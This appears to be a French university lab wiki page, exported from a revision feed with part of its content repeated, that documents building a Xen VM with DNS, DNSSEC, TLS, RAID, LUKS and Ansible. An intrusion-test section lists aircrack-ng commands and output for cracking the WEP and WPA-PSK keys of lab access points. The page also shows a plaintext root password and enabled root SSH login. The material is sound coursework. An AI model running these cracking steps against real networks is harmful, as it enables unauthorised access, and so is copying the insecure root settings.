 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne dans le fichier /etc/bind/named.conf.options&lt;br /&gt;
 dnssec-enable yes;&lt;br /&gt;
&lt;br /&gt;
On crée un répertoire /etc/bind/karmeliet.site.dnssec et on crée la clé asymétrique de signature de clé de zone&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
On obtiens après quelques heures le résultat :&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ 59911999 ]&lt;br /&gt;
&lt;br /&gt;
 Master Key : EF A3 6F 02 E7 F1 DF 01 62 03 92 87 81 ED 99 6D &lt;br /&gt;
              25 28 7D D6 54 FC 29 41 5D BD E9 02 26 E7 F0 58&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n karmeliet.site-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n karmeliet.site-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n karmeliet.site-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe notre clé est chiffré.&lt;br /&gt;
&lt;br /&gt;
=Ferme de serveurs Web=&lt;br /&gt;
&lt;br /&gt;
==Ansible==&lt;br /&gt;
&lt;br /&gt;
Se connecter à notre VM pra-04&lt;br /&gt;
 xen console /etc/xen/pra-04.cfg&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/network/interfaces&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.104&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
On ping sur notre zabeth pour savoir s'il communique bien ensemble&lt;br /&gt;
 ping 172.26.145.58&lt;br /&gt;
&lt;br /&gt;
On clone le git sur la zabeth puis on travaille dans le dossier&lt;br /&gt;
 git clone https://github.com/thomas-maurice/polytech-asr-lab.git&lt;br /&gt;
&lt;br /&gt;
On génère sur la zabeth une clé ssh&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;selim.bensalem@polytech-lille.net&amp;quot; -P ''&lt;br /&gt;
&lt;br /&gt;
Sur la zabeth, on rajoute au fichier authorized_keys la clé ssh précédemment créée et sur la VM, on crée un fichier authorized_keys avec la même clé&lt;br /&gt;
&lt;br /&gt;
On ajoute un role ssh_key&lt;br /&gt;
 - name: &amp;quot;Deploy ssh_keys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: authorized_keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: '0600&lt;br /&gt;
&lt;br /&gt;
On crée une template pour copier tous les clés dans authorized_keys de la VM&lt;br /&gt;
  % for ssh_key in ssh_keys%}&lt;br /&gt;
 {{ssh_key[&amp;quot;key&amp;quot;]}}&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
On lance ansible&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
==Consult==&lt;br /&gt;
&lt;br /&gt;
on installe consult et un container docker&lt;br /&gt;
 ---&lt;br /&gt;
 - name: &amp;quot;Create group&amp;quot;&lt;br /&gt;
   group:&lt;br /&gt;
     name: consul&lt;br /&gt;
     gid: 666&lt;br /&gt;
 - name: &amp;quot;Create user&amp;quot;&lt;br /&gt;
   user:&lt;br /&gt;
     name: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
     uid: 666&lt;br /&gt;
 - name: &amp;quot;Create /etc/consul&amp;quot;&lt;br /&gt;
   file:&lt;br /&gt;
     path: /etc/consul&lt;br /&gt;
     state: directory&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Create /var/lib/consul&amp;quot;&lt;br /&gt;
   file:&lt;br /&gt;
     path: /var/lib/consul&lt;br /&gt;
     state: directory&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Client json&amp;quot;&lt;br /&gt;
   copy:&lt;br /&gt;
     src: consul.json&lt;br /&gt;
     dest: /etc/consul/consul.json&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Start consul with container&amp;quot;&lt;br /&gt;
   docker_container:&lt;br /&gt;
     name: dockerConsul&lt;br /&gt;
     image: bitnami/consul&lt;br /&gt;
     volumes:&lt;br /&gt;
       - /etc/consul&lt;br /&gt;
     network_mode: host&lt;br /&gt;
     user: consul&lt;br /&gt;
     groups:&lt;br /&gt;
       - consul&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=58090</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=58090"/>
				<updated>2022-01-12T17:32:45Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Sécurisation de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
